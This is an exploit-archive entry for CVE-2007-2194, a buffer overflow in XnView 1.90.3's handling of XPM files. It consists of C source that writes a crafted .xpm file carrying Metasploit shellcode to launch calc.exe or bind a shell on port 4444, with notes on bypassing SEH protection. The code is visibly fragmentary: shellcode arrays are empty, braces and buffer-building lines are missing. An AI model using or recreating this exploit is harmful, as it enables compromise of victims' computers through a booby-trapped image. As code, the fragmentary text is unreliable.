XnView 1.90.3 - '.xpm' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-2194  
Publish Date: 22 Apr 2007
Author: Marsu

*                                                                            *
*                  XnView 1.90.3 .XPM File Buffer Overflow                   *
*                                                                            *
*                                                                            *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM   *
* File. It fails to check the length of the arguments passed to the defined  *
* array which leads to code execution.                                       *
* This exploit runs calc.exe or binds shell to port 4444.                    *
*                                                                            *
* Tested against Win XP SP2 FR.                                              *
* Have Fun!                                                                  *
*                                                                            *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                 *

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =

/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =

char XPMHeaders[]=

int main(int argc, char* argv[])
	FILE* xpmfile;
	char evilbuff[6600];
	int offset=0;

	printf("[+] XnView 1.90.3 .XPM File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc!=3) {
		printf("[+] Usage: %s Mode <file.xpm>\n",argv[0]);
		printf("[+] Mode is 0 -> run calc.exe\n");
		printf("[+]         1 -> bind shell to port 4444\n");
		return 0;
	//Ret address depends of the way you open the document
	//jmp over EIP + pop pop ret in ??? to defeat SEH protection + jmp back to our shellcode
	//there are 3ret add because files can be accessed in multiple ways
	if (!atoi(argv[1]))

	//End of file
	if ((xpmfile=fopen(argv[2],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;
	fwrite( evilbuff, 1, 6600, xpmfile );
	printf("[+] Done. Have fun!\n");
	return 0;

// milw0rm.com [2007-04-22]